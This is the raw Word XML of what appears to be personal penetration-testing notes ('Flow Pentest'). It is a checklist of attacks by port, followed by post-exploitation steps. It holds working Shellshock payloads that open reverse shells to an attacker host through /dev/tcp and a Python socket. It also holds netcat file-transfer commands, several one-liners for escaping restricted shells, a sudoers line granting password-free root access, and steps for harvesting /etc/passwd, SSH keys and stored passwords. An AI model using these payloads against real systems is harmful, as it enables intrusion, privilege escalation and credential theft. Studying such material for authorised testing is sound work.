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3247C" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60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Flow Pentest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA9FF" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C6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Sunday, August 14, 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E58CA2" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C6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12:56 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50D309" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C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BCABE1" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Scan of host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481AA5A3" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 21 (FTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41514252" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 22 (SSH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A110A" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 23 (Telnet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311C90E3" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 25 (SMTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEF2FA7" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 80 &amp; 443 (HTTP/S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0603F5AF" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Check for /robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F4F025" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Check source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FADB6C6" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Scan with Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3649A305" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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If using proxy: Nikto –useproxy [proxyIPADDR]:port -h IPADDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FFCF88" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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CGI-BIN discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC970A5" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="5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Shellshock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3346D" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="6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Test if vulnerable: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; /bin/bash -c ‘echo vulnerable’” </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://TARGETIPADDR/cgi-bin/status</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> -e use_proxy=yes -e http_proxy=proxyIPADDR+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242EDBD8" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="6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$ wget -qO- -U “() { test;};echo \”Content-type: text/plain\”; echo; echo; /usr/bin/python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”HOSTIPADDR\”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\”/bin/sh\”,\”-i\”]);’ 2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>″</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e use_proxy=yes -e http_proxy=PROXYIPADDR </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://WEBSITEIP/cgi-bin/status</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34B4A152" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="6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Shell: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; /bin/bash -i &gt;&amp; /dev/tcp/HOSTIP/PORT 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>″</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Lora"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://TARGETIPADDR/cgi-bin/status</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> -e use_proxy=yes -e http_proxy=PROXYIPADDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D94F1" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="6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 xml:space="preserve">curl -x </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://192.168.1.9:3128</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H “User-Agent: () { ignored;};/bin/bash -i &gt;&amp; /dev/tcp/192.168.1.7/1234 0&gt;&amp;1” </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://192.168.1.9/cgi-bin/status</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0867A657" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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lastRenderedPageBreak/>
        <w:t>Dirbuster (GUI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B650158" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Login Form Discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF1471D" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41FB94" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715D20A6" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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File traverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBA6FE0" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Test HTTP options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3762A9AF" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Upload file using Curl with if PUT option is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F147916" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Wget file via command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F762B04" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Activate shell file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635D131D" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B33780" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A64D58E" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Local File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3961A14C" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7175ABFC" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Check all directories for usernames or potential passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A53D869" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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Switch user agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA20359" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 110 (POP3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B672096" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 111 (RPCBind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E59D742" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 139/445 (SMB/RPC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A3E4BB" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 161 (SNMP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258AA709" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 1521 (Oracle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5336DA96" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 3128 (Proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6C8FEB" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Port 3306 (MySQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA2C00" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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UNKNOWN PORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D6B8C5" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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NO PORTS LISTED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B1CF4" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Enumeration &amp; Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5712B01B" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Run enumeration script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FAD221" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Transfer Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5BF90D" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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By Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426E695A" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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on Host: nc -lvp PORT &lt; example.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CC7564" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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on target: nc -nv HOSTIP PORT &gt; example.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0530B" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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By wget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133EC569" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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wget IPADDR/example.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A27FCA6" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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start apache2 before hand</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B144C4A" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="5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service apache2 restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BF8081" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Escape limited shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B1DBF5" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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python -c ‘import pty;pty.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F503306" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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echo os.system(‘/bin/bash’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C2521B" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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/bin/sh -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D4C95A" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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awk ‘BEGIN {system(“/bin/sh”)}’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153D389F" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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find / -name blahblah ‘exec /bin/awk ‘BEGIN {system(“/bin/sh”)}’ \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B1E4B4" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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python: exit_code = os.system(‘/bin/sh’) output = os.popen(‘/bin/sh’).read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9FCF65" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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perl -e ‘exec “/bin/sh”;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE40ECA" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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perl: exec “/bin/sh”;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24181E98" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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ruby: exec “/bin/sh”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5A846F" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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lastRenderedPageBreak/>
        <w:t>lua: os.execute(‘/bin/sh’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479780A6" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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irb(main:001:0&gt; exec “/bin/sh”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2F307B" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Check sensitive files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F639FCC" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Check kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF62907" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Check distro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90DC2B" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Check for sudo privileges on non-root account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B234D" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Add sudo privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38663E54" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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USERNAME ALL=NOPASSWD; !/usr/bin/su, /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4571F202" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Check for passwords in config files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5E1A3B" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Which services are running by root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18212BAB" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Check for SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B94F79E" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Set SUID on file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC4097" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Which files are world writeable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E76B2AC" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Service configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB17E2D" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Scheduled cronjobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76424A67" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Search for plain text usernames or passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D4B40" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Check for secondary interfaces &amp; networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CACBD94" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Check which languages are installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F19CBF" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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How can files be uploaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45173E40" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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SSH keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BC08A0" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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View bash history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A3A0C3" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Default password locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B5358" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35995693" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Enumerate localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569B05B1" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Cracking Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14362B4C" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Check for Password reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D27CDD5" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C60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enumerate users via cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1072AA" w14:textId="77777777" w:rsidR="00B90C60" w:rsidRDefault="00B90C60" w:rsidP="00B90C6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Misc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410BE190" w14:textId="77777777" w:rsidR="00570464" w:rsidRDefault="00570464"/>
    <w:sectPr w:rsidR="00570464" w:rsidSect="00185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15028"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8754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60"/>
    <w:rsid w:val="00033F89"/>
    <w:rsid w:val="00570464"/>
    <w:rsid w:val="00B9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F5E5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D3A4F4B4-F85F-40C7-B6F8-5E4109BFB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0C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90C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9:312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ARGETIPADDR/cgi-bin/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SITEIP/cgi-bin/statu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ARGETIPADDR/cgi-bin/statu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92.168.1.9/cgi-bin/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2022-11-28T13:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-28T13:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>